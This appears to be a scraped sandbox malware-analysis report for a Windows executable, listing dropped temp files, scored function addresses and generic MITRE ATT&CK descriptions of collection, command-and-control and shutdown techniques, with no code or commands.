Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\2-64-111

C:\Users\user\AppData\Local\Temp\Halitherses

C:\Users\user\AppData\Local\Temp\aut12AC.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
EIvidclKOb.exe

Function 00F03B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00F049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00F04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00F69155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00F03015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00F03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00F0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00F03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00F03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00F03766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 01947F98 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00F039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01947D48 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
fileCOMMON

Function 00F0407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre